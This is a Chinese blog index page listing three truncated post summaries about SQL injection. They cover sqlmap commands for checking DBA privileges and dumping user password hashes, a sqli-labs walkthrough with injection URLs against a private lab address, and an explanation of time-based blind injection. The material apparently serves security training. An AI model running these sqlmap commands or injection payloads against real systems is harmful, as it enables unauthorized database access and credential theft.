摘要:
SQLmap常用语法: 1.判断当前用户是否是dba(数据库管理员):python sqlmap.py -u "url" --is-dba2.--users:列出数据库管理系统用户:python sqlmap.py -u "url" --users3.--passwords:数据库用户密码(hash 阅读全文
posted @ 2020-03-06 20:09
小炮无邪
阅读(668)
评论(0)
推荐(0)
摘要:
第一关:单引号字符串型回显注入http://192.168.13.155/sqli/Less-1/?id=1' and 1=1--+http://192.168.13.155/sqli/Less-1/?id=1' and 1=2--+ http://192.168.13.155/sqli/Less- 阅读全文
posted @ 2020-03-06 13:41
小炮无邪
阅读(1551)
评论(0)
推荐(0)
摘要:
1 基于时间型SQL盲注 注入SQL 代码之后, 存在以下两种情况: 如果注入的SQL代码不影响后台[ 数据库] 的正常功能执行, 那么Web 应用的页面显示正确( 原始页面) 。 如果注入的SQL 代码影响后台数据库的正常功能( 产生了SQL 注入) , 但是此时Web 应用的页面依旧显示正常( 阅读全文
posted @ 2020-03-06 13:06
小炮无邪
阅读(2480)
评论(0)
推荐(0)
浙公网安备 33010602011771号